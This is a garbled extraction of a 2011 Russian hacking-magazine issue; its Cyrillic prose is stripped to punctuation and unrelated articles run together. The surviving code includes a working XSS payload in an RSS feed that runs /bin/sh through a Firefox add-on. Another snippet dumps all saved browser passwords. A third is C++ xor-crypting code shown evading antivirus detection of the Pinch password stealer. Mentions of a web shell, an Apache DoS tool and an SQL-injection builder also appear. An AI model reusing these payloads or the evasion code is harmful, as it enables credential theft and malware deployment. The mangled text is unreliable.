*** LOG addons.xpi: Calling bootstrap method startup on jid0t3eeRQgGANLCH9c50lPqcTDuNng@jetpack version 0.0.19
*** LOG addons.updates: Requesting https://localhost/update.rdf
*** WARN addons.updates: HTTP Request failed for an unknown reason
,
, SSL. , , ,
.
AMO, -
. 20
AMO ,
AMO.
076
RSS-
AMO, ,
.
AMO , , - .
(
).
AMO, . ,
. AMO
AMO. : .
-
.
,
AMO.
, (
) AMO.
, ,
,
.
.
,
,
AMO.
. AMO.
, .
. , , .
. ,
,
. . ,
, ,
. .
:
JavaScript;
Remote XUL;
.
,
, AMO,
.
,
Opera Chrome.
,
. . , chrome://.
, XPCOM ,
.
12 /155/ 2011
Firefox
args=["-c","galculator"];
process.run(false,args,args.length);
})()+alert('XSS/foo
</link>
<pubDate>Sun, 21 Aug 2011 21:34:10 +0400</pubDate>
<description>some text</description>
</item>
XPCOM . ,
, .
, , URI data:..?
JS ,
- DOM Based XSS .
. , , , ,
, data-.
Simple RSS Reader AMO
.
, . ,
,
. , RSS-
, , - .
Simple RSS Reader (bit.ly/
t0oJO6),
.
RSS-, , . , - .
,
( ).
. , ,
feedUri.
- :
menuitem.setAttribute('onmouseover',
"SRR.setStatusBar('"+feedUri+"')");
RSS- (
XML-, )
, (
, ) ,
. :) -,
,
... ! !
(, !)
:
<item><title>some title</title>
<link>
data:eeee')+(function()
{
file=Components.classes["@mozilla.org/file/local;1"].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("/bin/sh");
process=Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);
process.init(file);
12 /155/ 2011
,
.
. .
-, ? -,
,
!
:
var dump = '';
try
{
var myLoginManager = Components.classes[
"@mozilla.org/login-manager;1"].
getService(Components.interfaces.nsILoginManager);
var logins = myLoginManager.getAllLogins({});
for (var i = 0; i < logins.length; i++)
{
dump = dump + logins[i].hostname + ':' +
logins[i].username + ':' + logins[i].password +
'\n';
}
alert(dump);
}
catch(ex)
{
// This will only happen if there is no
// nsILoginManager component class
}
, , eval()
. , , , AMO.
OUTRO
Add-on SDK, JetPack.
XUL!
JavaScript, HTML CSS.
. , ! ;) z
077
life4u (a.e.faronov@gmail.com)
:
AdSense
10 .
.
,
.
078
WWW
www.google.com/
adsense Google
AdSense;
direct.yandex.ru
.;
www.spybox.com.
ua
-
SpyBox;
www.adwatcher.com
Adwatcher;
jspy.ru
;
piwik.org
Piwik;
www.google.
com/analytics/
.
( . click fraud )
, () .
( ,
, ),
( ). ,
1015 % .
,
. PPC-.
,
. , . , .
AdSense .
,
. , ,
12 /155/ 2011
: AdSense
SpyBox
- Adwatcher
, , (
-, $0,1 ).
: , , - !
.
,
, , .
, , . . ,
,
.
, , .
.
, .
.
.
PPC- (Pay-perClick , ,
, ). ,
.
(, IP ).
,
.
12 /155/ 2011
, ,
,
.
,
.
1. IP-,
, - .
, IP
.
2. ,
, , :
,
,
.
079
?
:
PPC- ?
, /
. , . 2007
Yahoo! .
Checkmate Strategic Group.
Yahoo!
2004 .
2006 Google
90 .
,
,
.
3. , ,
( , , ), :
.
4. , , .
. :
, (, - ),
,
100.
.
5.
,
.
: SPYBOX
, .
. , / ,
,
. , 100 % , ( ,
).
-
SpyBox. , -,
, ,
, , ,
.
: HTML-,
</body>.
(
):
<noindex>
<script type='text/javascript'>
var script=document.createElement('script');
080
script.type='text/javascript';
...
if(localStorage.spybox)
{
var spybox_hash='a181a603769c1f98ad927e7367c7aa51';
var spybox_session=localStorage.spybox;
script.src='http://ua.robotreplay.net/fast.js';
}
...
document.getElementsByTagName("head")[0].
appendChild(script);
</script></noindex>
, , . :
, ,
- .
, . ,
IP
( ,
- ),
. . , SpyBox
: (
1000 ),
( , ,
,
).
ADWATCHER
SpyBox, , , .
,
, , ?
Adwatcher,
, SpyBox,
!
,
,
.
, !
2003 ,
Google 150 .
, ,
, Google
Clique , Google
. , Google ,
. ,
,
. , ,
2009 . Microsoft ,
,
Microsoft.
750 .
- .
, ,
.
12 /155/ 2011
: AdSense
- Adwatcher
,
Google Analytics
xakep.ru
.
-
( IP) (,
, , , , ).
( )
30- . ,
fraud reports, .
,
, ( ,
)
:
<script language="javascript" type="text/javascript">
...
document.write('
<img src="http://s8.adwatcher.net/demov3/tracker.
php?t='+ id[1]+'&ref='+r+'&land='+l+'"
style="border:0px;width:1px;height:1px;" />');
</script>
,
. Adwatcher 30
. ,
, ,
,
Adwatcher SpyBox.
12 /155/ 2011
,
: Google Analytics Piwik (
PHP-,
). , ,
,
. :
, ,
. , ,
( 40 ,
), ,
.
. ,
.
,
,
. ,
. ,
, .
, (
, ).
,
. ,
, ,
,
, :). z
081
X-Tools
:
BECHED
:
Max Artemev
:
Zdez Bil Ya
URL:
bit.ly/nIXs3V
URL:
widecap.ru
URL:
bit.ly/qLkZuZ
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
WEB-SHELL
SSI
C
WIDECAP
TWITTER REGGER
, ,
PHP-
. ,
. ,
- - .
,
,
.
.
? ! SSI
(server side includes) ,
, #exec
cmd.
.
SSI-,
PHP. :
;
SSI- ;
;
HTTP_COOKIE;
JavaScript.
WideCap , TCP/IP- -
-.
Winsock.
: SOCKSv4, SOCKSv5, HTTP/
HTTPS.
:
1. .
:
, , DNS, , .
2. -, .
3. .
,
.
4. .
, .
,
.
, :
(
e-mail);
;
(, , );
( avatars);
;
.
082
, ,
WideCap - :).
: ,
, ,
,
- ..
, . , ,
.
name.txt.
accounts.txt.
,
.
,
.
12 /155/ 2011
X-Tools
:
S4(uR4
URL:
bit.ly/pxjMKi
:
*nix/win
ALANA K!LL3R
,
HTTP- Apache (bit.ly/rqvHBi),
,
.
, ,
!
Alana K!LL3R
S4(uR4
. ,
.
, PoC
killapache.pl Kingcope.
--
,
. S4(uR4
PHP + cURL
Perl ,
(, ,
. .).
:
GET- (byte ranges)
,
.
:
Gremwell
:
Danijel Maxa MaXoNe
:
VaZoNeZ
URL:
www.gremwell.com
URL:
bit.ly/orsqKn
URL:
vazonez.com/page/
stegano
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
: Windows
2000/XP/2003 Server/
Vista/2008 Server/7
MAGICTREE:
SQL- MAXSQLI
SYNTAX BUILDER
BMP-
-
,
, , nmap? ?
, MagicTree.
.
(W3AF,
Acunetix, OpenVAS, Nessus, Burp, nmap . .),
(, nmap nikto)
(HTML, MS Word .).
Tree ()
,
,
Magic ()
,
,
.
,
,
www.gremwell.com/
documentation.
/
/HTTP-/
SQL-,
MaxSQLi Syntax Builder,
SQL-.
SQLi, error based. :
;
UNION;
WAF
;
;
;
;
;
, ;
string integer based.
,
,
. , ,
. Stegano,
BMP.
,
:
1. -.
2.
.
3. (,
).
4. (
)
.
, , ,
,
,
SQL-.
,
: .
.
12 /155/ 2011
083
MALWARE
deeonis (deeonis@gmail.com)
. ,
,
,
.
.
084
, ,
. , - ,
exe-.
;).
,
-.
, .
. , , ,
-, .
.
,
,
. ,
. ,
.
1. Kaspersky Crystal. . Kaspersky
Crystal .
,
.
, .
2. Dr. Web Security Space. Dr. Web Security Space,
.
12 /155/ 2011
FLY-CODE, , ,
.
3. ESET NOD32 Smart Security 5. ESET NOD32
Smart Security 5. ,
. , ,
,
.
4. Avast! Free Antivirus.
Avast! Free Antivirus.
, ,
.
. exe ,
. PE-
.
,
.
.
exe, API,
exe, , .
,
HLL-. ,
,
. , .
Pinch. exe- , .
Trojan-PSW.Win32.LDPinch.dlt, Dr. Web Trojan.Packed.1197,
NOD32 Win32/PSW.LdPinch.NMJ, Avast ,
Win32:LdPinch-NO [Trj]. ,
notepad.exe. ,
.
1
.
MZ- PE-,
. - notepad.exe.
,
,
API- .
Kaspersky Cristal.
.
. NOD32 Smart Security , Win32/PSW.LdPinch.NMJ.
Avast ,
, .
,
. - , ,
:).
,
. , .
xor
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
, . , , .
, . Dr. Web
. NOD32 Smart Security 5 :
, .
Avast, .
. . , xor, , ?
2
.
32- .
xor. ,
, ,
12 /155/ 2011
xor
085
MALWARE
KASPERSKY?
, Kaspersky Crystal,
. -,
Trojan-PSW.Win32.LDPinch.dlt,
, ,
Trojan-PSW.Win32.LDPinch.zie.
, -
.
,
, . ,
.
, ,
,
. , ,
, ,
, ,
,
.
Pinch, -
3
, , xor ,
Kaspersky Dr. Web,
.
. 142-
. ,
API.
CreateFile,
ntldr. ,
, , ,
INVALID_HANDLE_VALUE.
. ,
, , ,
CreateFile.
CreateFile
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0,
OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
DWORD key = 0x45F983A0;
for (size_t i = 0;
i < (fsize / sizeof(DWORD));
i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
}
return crypt_file;
}
086
NOD32
, CreateFile
, INVALID_HANDLE_VALUE.
, , , API.
, ,
. ,
, Trojan-PSW.Win32.LDPinch.zie.
Dr. Web Security Space . ,
, Infected Archive. NOD32 Avast Free
Antivirus .
.
4
:
, , ,
?
, ? ,
,
PE- .
,
, , . , notepad.exe
,
.
, : ,
NOD32 Avast .
.
, . Pinch
.
12 /155/ 2011
5
. xor
, Dr. Web,
.
256
.
, .
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
//
CopyMemory(
crypt_file,
(VOID*)(((BYTE*)pfile) + 0x100 ),
fsize - 0x100);
CopyMemory(
(VOID*)(((BYTE*)crypt_file) + (fsize - 0x100)),
pfile,
0x100);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
,
, 4. Kaspersky Crystal Dr. Web
, . ,
, , , ,
- . ,
, , .
6
.
.
, .
, , C++
:
void swapMemBlock(ULONG begin, ULONG end)
{
ULONG half = (end - begin) / 2;
if (half < 0x4)
return;
BYTE *buff = new BYTE[end - begin];
ZeroMemory(buff, end - begin);
CopyMemory(buff, (PVOID)begin, end - begin);
CopyMemory((PVOID)begin, &buff[half], half);
CopyMemory((PVOID)(begin + half), buff, half);
12 /155/ 2011
delete[] buff;
swapMemBlock(begin, begin + half);
swapMemBlock(begin + half, end);
}
. Kaspersky, , NOD32 - .
. Kaspersky Crystal
. ,
, .
, Kaspersky Crystal,
. ! Dr.Web Security
Space . FLY-CODE
, . ESET
NOD32 Smart Security 5 Avast! Free Antivirus,
,
xor. ,
,
.
. ! z
087
MALWARE
(201074@mail.ru)
,
,
,
, , ,
, HIPS . . (
, :) ).
, .
088
DVD
ClamWin,
ClamAV
Windows, AVZ
.
WWW
: goo.gl/Usltc.
goo.gl/Kq3kw
,
(
-),
(BlackCash).
goo.gl/uI848
C++, goo.gl/ubwgt
C++.
12 /155/ 2011
1. , (: virulist.com)
,
,
. ,
:
,
,
.
,
( 1).
, . ,
, , ,
.
,
.
: , ,
,
. .
:
.
.
2. md5- ClamAV
: md5-,
( )
.
() , . ,
,
, ,
. ,
,
, . , -
12 /155/ 2011
3. HEX- ClamAV
089
MALWARE
,
, , ,
iChecker.
, .
. ,
, :
, .
. , Panda Software UltraFast,
AVZ ,
( )
( ).
iSwift ( iStream)
iChecker
NTFS.
,
.
4. , AVZ
.
. ,
md5-
.
ClamAV. , ,
, .
: main.cvd
daily.cvd.
. 2
md5-.
: md5-, , .
: ; , ; ,
090
5.
( ); - ;
, , . .
,
HEX-,
( 20 400 ),
.
,
. ,
.
(
)
(
). 3
HEX- daily.cvd
ClamAV. , .
, :
, , .
, . ,
, . ,
( )
, HEX.
.
, .
,
, .
,
-.
,
( , ,
JS-,
).
( ), -
12 /155/ 2011
, ,
:
EXECUTE READ,
WRITE;
PE- ;
;
- .
6. Gigpycll Win32.Palevo
.
( API- FindFirst FindNext)
. , ,
, API- ( NtOpenFile NtCreateFile).
,
.
, ,
,
.
. , ,
,
( ,
). , , .
: ,
, .
, ,
.
,
. , ,
.
,
.
( ,
). ,
, , ,
.
12 /155/ 2011
, , ,
( , ;
).
, ,
. ,
,
. ,
.
,
. , .
, :
,
( );
, ( ).
, ? ,
. :
;
( ,
, ,
, ,
photo.jpg.exe);
( , ,
PE-, .pif .com);
(
.exe .pif).
, , AVZ ( 4).
,
.
. text.
PE- , ,
, jmp -
,
.
, , , ,
( 5).
,
, ,
.
, ,
(.text, .data, .idata, .rdata, .reloc, .rsrc). -
091
MALWARE
, API- , DLL , , ,
GetProcAddress ,
-
.
, ,
. , , .
.
7. API-,
DLL explorer.exe,
, ( 6).
- , , AntiVirus Plus
McAfee ,
. , - API-
URLDownloadToFile ShellExecute.
, , VirtualAlloc, WriteProcessMemory
CreateRemoteThread.
, . ,
, . ,
,
.
,
.
, . asm,
(
C#, C, C Builder VB). explorer.exe, , ,
,
, ,
, ( 7, 8).
, . ,
? ,
(
, ),
.
, . .
(AVZ, , UPX).
092
, , ,
.
:
,
;
,
;
.
.
- .
. , ,
. ,
.
, , .
( ,
, , ,
) ,
.
, .
,
, .
.
:
1. , ( , , ,
. .).
2. .
3. .
4. .
:
5. ( ,
,
, ).
6. ( , , ),
, 7 8 ,
(, ).
7. 9.
8. .
9. ( ,
).
12 /155/ 2011
8. API-, -,
10. ( EIP).
11. ( ,
,
).
.
, ,
,
. ,
, .
EDX, ESP EIP.
. EDX EIP
,
. ESP,
. ESP ,
.
.
12 /155/ 2011
,
, , .
.
(
), . ,
,
.
.
, , ,
, , , .
, , HIPS, ,
- . z
093
MALWARE
(www.esagelab.ru)
PoC
,
, , .
?
.
,
, , . ,
,
malware, , -. ,
? ? ,
,
,
.
:
, ,
.
, Dynamic Binary
Instrumentation Engine. ,
-
,
.
UnFSG (bit.ly/v1nV81), (bit.ly/vNYAYA).
,
.
, ,
.
:
, , ,
, . ,
094
12 /155/ 2011
CreateToolHelp32Snapshot() SpyEye,
,
- (
,
), .
:
1. , CreateProcess() DEBUG_PROCESS.
2. WaitForDebugEvent()
,
.
3. , ,
. , SpyEye
12 /155/ 2011
CreateToolHelp32Snapshot(). ,
0xCC ( int 3) WriteProcessMemory().
4. ,
ReadProcessMemory()
.
,
, ,
. :
1. FileAlignment SectionAlignment.
2. ImageBase
,
.
3.
RawOffset VirtualOffset .
, , (
), , ,
IDA Pro LoadLibraryEx() DONT_RESOLVE_DLL_REFERENCES
.
PO: SIMPEUNPACKER
SimpeUnpacker,
GitHub
(github.com/Cr4sh/SimpleUnpacker). SimpeUnpacker
,
:
095
MALWARE
IDA Pro
input_file
, , '--bp'
, .
'--bp' .
dumped.exe.
,
, .
SimpleUnpacker.exe SpyEye:
C:\> SimpleUnpacker.exe dropper.exe --bp kernel32.dll!
CreateToolhelp32Snapshot
[+] Breakpoint: kernel32.dll!CreateToolhelp32Snapshot()
[+] Process command line: "dropper.exe"
CREATE_PROCESS: ImageBase=0x00400000,
StartAddress=0x00420090
DLL_LOAD: 0x7c900000 "ntdll.dll"
DLL_LOAD: 0x7c800000 "C:\WINDOWS\system32\kernel32.dll"
[+] Breakpoint on kernel32.dll!CreateToolhelp32Snapshot()
has been set: 0x7c865b1f
DLL_LOAD: 0x7e410000 "C:\WINDOWS\system32\USER32.dll"
DLL_LOAD: 0x77f10000 "C:\WINDOWS\system32\GDI32.dll"
DLL_LOAD: 0x73000000 "C:\WINDOWS\system32\WINSPOOL.DRV"
DLL_LOAD: 0x77dd0000 "C:\WINDOWS\system32\ADVAPI32.dll"
DLL_LOAD: 0x77e70000 "C:\WINDOWS\system32\RPCRT4.dll"
DLL_LOAD: 0x77fe0000 "C:\WINDOWS\system32\Secur32.dll"
DLL_LOAD: 0x77c10000 "C:\WINDOWS\system32\msvcrt.dll"
DLL_LOAD: 0x3d930000 "C:\WINDOWS\system32\WININET.dll"
DLL_LOAD: 0x77f60000 "C:\WINDOWS\system32\SHLWAPI.dll"
DLL_LOAD: 0x78130000 "C:\WINDOWS\system32\urlmon.dll"
DLL_LOAD: 0x774e0000 "C:\WINDOWS\system32\ole32.dll"
096
, -
,
. ,
, TOP 100 VirusTotal SpyEye. ,
70% (
SpyEye
, ). ,
,
.
,
, . z
12 /155/ 2011
M0r1arty (moriarty@front.ru)
PHP
PHP-
PHP
,
.
,
.
WARNING
DVD
,
mysql_connect.
12 /155/ 2011
WWW
devzone.zend.com/
article/1021
3
.
habrahabr.ru/blogs/
php/98862/
.
http://bit.ly/
nm0fTy
.
gnuwin32.sourceforge.net/
.
http://pecl.php.net/
.
http://bit.ly/n3pnhK
,
PHP .
PHP
, Extension
Writing . .
ext
PHP. , , . ,
: config.m4
config.w32. UNIX-,
Windows. configure
, ; ,
. .
,
Makefile .
MINIT.
, , INI entry . .
097
:
Zend, , php.ini,
dl, deprecated.
RINIT. ,
.
RSHUTDOWN. , , RINIT.
web- Zend MSHUTDOWN. . /
MINIT/MSHUTDOWN,
RINIT/RSHUTDOWN.
Zend
. , malloc/free/calloc/realloc . .,
- (. 1). Zend
: Non-Persistent ( e) Persistent (
pe). , Persistent
( ) , NonPersistent . , MINIT-RINIT-RSHUTDOWNMSHUTDOWN ,
emalloc, emalloc MINIT,
RINIT
. , Non-Persistent , Persistent . malloc/free
.
ZTS
, ,
. PHP ZTS (Zend Thread-Safety). ZTS TSRM
(Thread Safe Resource Management). ,
(), .
TSRM :
TSRM.h, ZEND_BEGIN_
MODULE_GLOBALS ZEND_END_MODULE_GLOBALS
,
, ( )
ZEND_DECLARE_MODULE_GLOBALS,
, MINIT ZEND_
INIT_MODULE_GLOBALS.
, - . PHP.
tsrm_tls_table resource_types_table,
tsrm_ls. :
static tsrm_tls_entry **tsrm_tls_table=NULL;
static tsrm_resource_type *resource_types_table=NULL;
void ***tsrm_ls;
typedef struct {
size_t size; //
ts_allocate_ctor ctor; //
ts_allocate_dtor dtor; //
int done; //
} tsrm_resource_type;
struct _tsrm_tls_entry {
098
GnuWin32 ,
UNIX
void **storage; //
int count; //- storage
THREAD_T thread_id; //
tsrm_tls_entry *next; //
};
tsrm_tls_table , tsrm_tls_enty .
resource_types_table, , , ( )
ZEND_INIT_MODULE_GLOBALS,
ts_allocate_id:
#define ZEND_INIT_MODULE_GLOBALS(module_name, \
globals_ctor, globals_dtor) \
ts_allocate_id(&module_name##_globals_id, \
sizeof(zend_##module_name##_globals), \
(ts_allocate_ctor) globals_ctor, \
(ts_allocate_dtor) globals_dtor);
TSRM_API ts_rsrc_id ts_allocate_id(ts_rsrc_id *rsrc_id,
size_t size, ts_allocate_ctor ctor,
ts_allocate_dtor dtor);
rsrc_id , , size
, ctor/dtor /
. ctor-, , , ,
( ).
12 /155/ 2011
PHP
tsrm_ls storage .
TSRMLS_C/TSRMLS_CC. ,
.
?
. tsrm_tls_table
. tsrm_tls_table resource_types_table SAPI,
tsrm_startup. tsrm_startup SAPI
tsrm_ls ts_resource_ex(0,NULL):
TSRM_API void *ts_resource_ex(
ts_rsrc_id id, THREAD_T *th_id);
ts_resource_ex tsrm_tls_table
tsrm_tls_entry , th_id ( NULL,
). ,
allocate_new_resource tsrm_tls_entry
, ,
tsrm_tls_entry.next .
TSRM. allocate_new_resource,
, storage .
( ) tsrm_resource_type.size,
(ctor) . , TSRM
. ( ) .
,
... . :
, .
, .
( ) .
PHP Windows.
PHP Linux ,
- .
PHP Windows. ,
.
, : nmake Makefile
Visual Studio php5ts.lib
. , ,
Windows, ,
?
PHP (goo.gl/TTgta). ,
. ,
VS2003, .
, GnuWin32.
(
Win-).
. MinGW. Cygwin, . ,
MinGW
./configure && make && make install.
12 /155/ 2011
,
PHP , ,
PHP libiconv. ,
, ,
MinGW PHP. .
. , MASM32
inc2l.exe.
inc- lib-.
_libiconv_version PROTO C ( , PHP
_libiconv_version). ...
PHP ,
. . ;)
. , VS2008.
PHP ( 5.3.8)
. (
, PHP).
, (
, - ),
. - GnuWin32?
, ,
, PHP,
Windows (,
). GnuWin32 ,
.
:
cd E:\gnuwin32\GetGnuWin32
download.bat
install E:\gnuwin32
,
Release_TS , php5ts.dll, php.exe . ,
!
Visual Studio, . , FileNew Project,
Makefile Project,
099
OK. General
Dynamic Library (.dll) Configuration Type.
C/C++/General Additional Include Directories
( ): G:\www\php-5.3.8;
G:\www\php-5.3.8\main\; G:\www\php-5.3.8\TSRM\; G:\www\php5.3.8\Zend\. Linker/General Additional Library Directories G:\www\php-5.3.8\Release_TS. Linker/Input Additional
Dependencies php5ts.lib. .
(C/C++/
Preprocessor Preprocessor Definitions):
ZEND_WIN32=1
PHP_WIN32=1
WIN32=1
ZEND_DEBUG=0
ZTS=1
COMPILE_DL_XHOOKER=1
, Windows. . ;)
: ,
, , . .
ZEND_DEBUG , (
php5ts.lib, php5ts_debug.lib).
ZTS , ZTS ( PHP
Thread Safe Non Thread Safe).
ZEND_DEBUG ZTS
, - ,
: --.
--. read. ,
.
COMPILE_DL_XHOOKER, , .
configure, , (--withextension=shared). XHOOKER
.
?
, ,
. . ,
, ,
scan parse_date.c 21
(!), #pragma optimize ("", off ).
, ,
(
). Apache
, PHP-
. ,
MSVCR90.dll,
( , PE Tools
). ,
.
, MT.EXE ( , )
.
100
. .
- ,
, - . CMS
, ,
URL. , , CMS
.
get_included_files,
, , . ,
, . ,
fopen, file_get_contents, file readfile. , !
MySQL- .
. , , ( php.ini).
( : get_readed_files)
(, $_READED_FILES). php.ini (
, ini_set .htaccess
).
? PHP , . :
void zif_FUNCNAME(int ht, zval *return_value,
zval **return_value_ptr, zval *this_ptr,
int return_value_used TSRMLS_DC)
:
PHP_FUNCTION(FUNCNAME)
, , ,
, ,
( ). ,
, .
12 /155/ 2011
PHP
data->internal_function.handler = hacked_file;
}
.
( , ). , .
callback:
zval* argv[1];
zval* func;
zval* retval = NULL;
MAKE_STD_ZVAL(retval);
argv[0] = XH_G(_my_readed_files);
MAKE_STD_ZVAL(func);
ZVAL_STRING(func,"var_dump",0);
call_user_function(EG(function_table),
NULL, func, retval, 1, argv TSRMLS_CC);
Sara Golemon
, ZTS ? , .
, PHP
, , ,
. ,
- , ,
.
executor_globals,
EG. PHP- (HashTable*).
zend_function_entry,
.
, PHP
var_dump(). ,
callback. call_user_function,
. :
function_table, ( NULL),
, , ,
.
. MINIT :
zend_register_auto_global("_READED_FILES",
sizeof("_READED_FILES")-1,NULL TSRMLS_CC);
, _READED_FILES
($_READED_FILES). RINIT :
ZEND_SET_GLOBAL_VAR("_READED_FILES",
XH_G(_my_readed_files));
arr_hash = EG(function_table);
for(zend_hash_internal_pointer_reset_ex(
arr_hash, &pointer);
zend_hash_get_current_data_ex(arr_hash,
(void**) &data, &pointer) == SUCCESS;
zend_hash_move_forward_ex(arr_hash, &pointer))
{
if(!strcmp("file",
data->internal_function.function_name))
{
original_file = data->internal_function.handler;
EXECUTOR_GLOBALS
12 /155/ 2011
,
.
.
, , unset($GLOBALS['_
READED_FILES']),
.
,
EG (symbol_table). ,
( , ),
,
get_readed_files().
, TSRM.
PHP. .
, . , PHP-.
, SAPI
. . z
101
(bumshmyak@yandex.ru)
C++11:
C++
++
,
.
.
102
WWW
-
: bit.ly/
oVEtjX.
: bit.ly/
gRbESx.
FAQ ++11
:
bit.ly/1gNDCk.
++11
Danny Kalev: bit.ly/
mOTT91.
INFO
++0x,
2010
. ++
x
INTRO
2011 ISO C++ (ISO/IEC
14882:2011). C++11.
2003 .
,
. 2007
TR1,
, ,
.
ISO :
C++ ,
, ; C++
.
. -,
, . , rvalue references (move
semantics) constexpr. , . (threads), (regex),
(tuples), . ,
, ( 1320 ).
.
?
(https://wiki.apache.org/stdcxx/C%2B%2B0xCompilerSupport).
12 /155/ 2011
, , .
GCC,
GCC 4.6.1 .
C++11, -std=c++0x.
, .
,
.
auto,
, . :
auto
auto
auto
auto
x = 42; // int
pi = 3.14; // double
c = 'x'; // char
str = string("xxx"); // string
CHECKPOINT
, :
#include <type_traits>
auto x = 42;
static_assert(std::is_same<decltype(x), int>::value,
"42 is not int");
static_assert(!std::is_same<decltype(x), unsigned int>::value,
"42 is unsigned int");
std::is_
same<FirstType, SecondType>::value,
. type_traits,
. type_traits
.
, type_traits
, , ,
:
, C++11, , ,
. auto . , . ,
template
template
template
template
<class
<class
<class
<class
T>
T>
T>
T>
struct
struct
struct
struct
POD-
.
auto ,
- . :
struct Person {
const char* name;
int age;
};
first second, third.
DECLTYPE STATIC_ASSERT
, , . decltype(expression)
. :
auto x = 2; // int
auto y = 2.0 // double
decltype(x + y) z; // double
static_assert. :
static_assert(expression, error_string)
static_assert , expression
.
- . expression
, error_string.
static_assert:
static_assert(sizeof(int) >= 4, "too small int");
12 /155/ 2011
is_pointer;
is_const;
add_const;
remove_reference;
?
(std::initializer_list), , ,
. {...} ,
, .
std::initializer_list ,
, .
, , .
,
:
#include <initializer_list>
class SequenceClass {
public:
SequenceClass(std::initializer_list<int> list) :
103
data_(list.begin(), list.end())
{ }
int size() {
return data_.size();
}
private:
vector<int> data_;
};
x seq, .
++11 , -.
-
. ++03
:
string a = "first";
string b("second");
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_(m) {}
};
, C++11,
, .
.
:
string a = {"first"};
string b{"second"};
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_{m} {}
};
D d{0};
, ,
std::initializer_list,
, . :
vector<int> a(4); // 4
vector<int> b{4}; // 4
, .
:
class D {
int m_ = 42;
};
(const static) .
, , .
FOR
- .
for,
.
:
vector<int> seq = {1, 2, 3, 4, 5};
for (auto x : seq) {
104
- (-, ) , .
, . .
- :
[capture list](parameters) -> return type {
body
}
-, parameters, , body,
return type. (capture list)
, ()
. ,
.
,
left right.
vector<int> a = {1, 2, 3, 4, 5};
int left = 2;
int right = 4;
int count = 0;
for_each(a.begin(), a.end(), [left, right, &count](int x) {
if (x >= left && x <= right) {
++count;
}
});
cout << count << endl;
? for_each
( ), .
-. .
, .
,
, &, . ,
.
void. , return
.
, -
, - , .
- , :
class F {
public:
F(int left, int right, int& count) :
left_(left),
right_(right),
count_(count)
{ }
void operator()(int x) const {
if (x >= left_ && x <= right_) {
++count_;
12 /155/ 2011
Feature
GCC
Intel C++
MSVC
auto
4.4 (v1.0)
11.0(v0.9)
10.0 (v0.9)
decltype
4.3 (v1.0)
11.0(v1.0)
10.0 (v1.0)
static_assert
4.3
11.0
10.0
Builtin type_traits
4.3
10.0
8.0
Initializer lists
4.4
4.7
Range-based for-loop
4.6
Lambda
4.5 (v0.9)
11.0 (v0.9)
12.0 (v1.0)
10.0 (v1.0)
11.0 (v1.1)
mymap, .
R-value references
4.3 (v1.0)
11.1 (v1.0)
12.0 (v2.0)
10.0 (v2.0)
11.0 (v2.1)
}
}
private:
int left_;
int right_;
int& count_;
};
for_each c -
:
for_each(a.begin(), a.end(), F(left, right, count));
:
[] ;
[=] , ;
[&] , , ;
[this] , .
.
1 N.
vector<int> a;
int last = 0;
std::generate_n(back_inserter(a), N, [last]() mutable {
return ++last;
});
,
mutable. , -,
:
std::function<signature>, ,
,
. ,
mymap,
, .
, mymap , neg,
.
( ) .
neg , ,
, . ,
. ,
. ,
,
, .
C++11 .
rvalue references:
. .
.
class MovableType {
MovableType(MovableType&& rhs);
MovableType& operator=(MovableType&& rhs);
};
, rvalue references
&&.
MovableType ,
. ,
,
.
++11 ,
.
OUTRO
ReturnType operator()(...) const { ... };
, mutable.
map:
vector<int> mymap(const vector<int>& input,
12 /155/ 2011
C++11, ,
. , ++
, , , .
, . , C++11 . z
105
(ivinside.blogspot.com)
!
,
, ,
.
106
12 /155/ 2011
1
1 100000.
. , .
.
inotify Linux,
. ,
.
. , ,
, . 1,
100000, 1.
: (a1 + an) * N/2, a1 ,
an , N . ,
, .
. , :
, , .
,
.
:
random2()
2 * random2()
, . , random4() ,
, . ,
random4() random3(), :
sum2
#
if deleted: print ' %s' % deleted
else: print ' '
#
def random2():
""" 0 1 """
return randrange(0, 2)
#
def random4():
""" 0, 1, 2 3 """
return random2() + 2 * random2()
#
def random3():
""" 0, 1 2 """
result = random4()
# ,
# , ,
#
if result == 3:
return random3()
return result
2
random2(), 0
1. random3(), 0, 1 2.
,
() ,
.
3
1: random4().
2: .
random4()?
, , random2(). :
, . .
. .
, , ?
: .
random2()
random2()
12 /155/ 2011
, . ! , ,
, ,
, . , .
.
: , , . , .
107
1
.
,
?
2
:
tokens = []
for token in tokeniter:
if token not in tokens:
tokens.append(token)
: ,
.
. - (youtu.be/
DTWZqh64RcQ). , ,
.
1. ,
chmod() .
Python :
# python2 -c "import os; os.chmod('/bin/chmod', 0755)"
Perl:
# perl -e 'chmod 0755, "chmod"'
tokensiter ,
, .
,
tokensiter.
.
3
Linux?
4
# nmap -sS -Pn -n -iL active-hosts
.
,
/ filtered.
?
, .
, ,
, . ,
,
.
, :
= 1
, :
__()
_()
__(-)
:
+= 1
' ', , ''
, ? ,
.
.
4
/bin chmod -x chmod. .
108
, , :
#include <sys/types.h>
#include <sys/stat.h>
int main()
{
chmod("/bin/chmod", 0000755);
}
2. GCC .
:
$ cat - > chmod.c
int main () { }
^D
$ cc chmod.c
$ cat /bin/chmod > a.out
$ mv a.out new_chmod
$ cat /bin/chmod > new_chmod
# new_chmod +x /bin/chmod
: . a.out, .
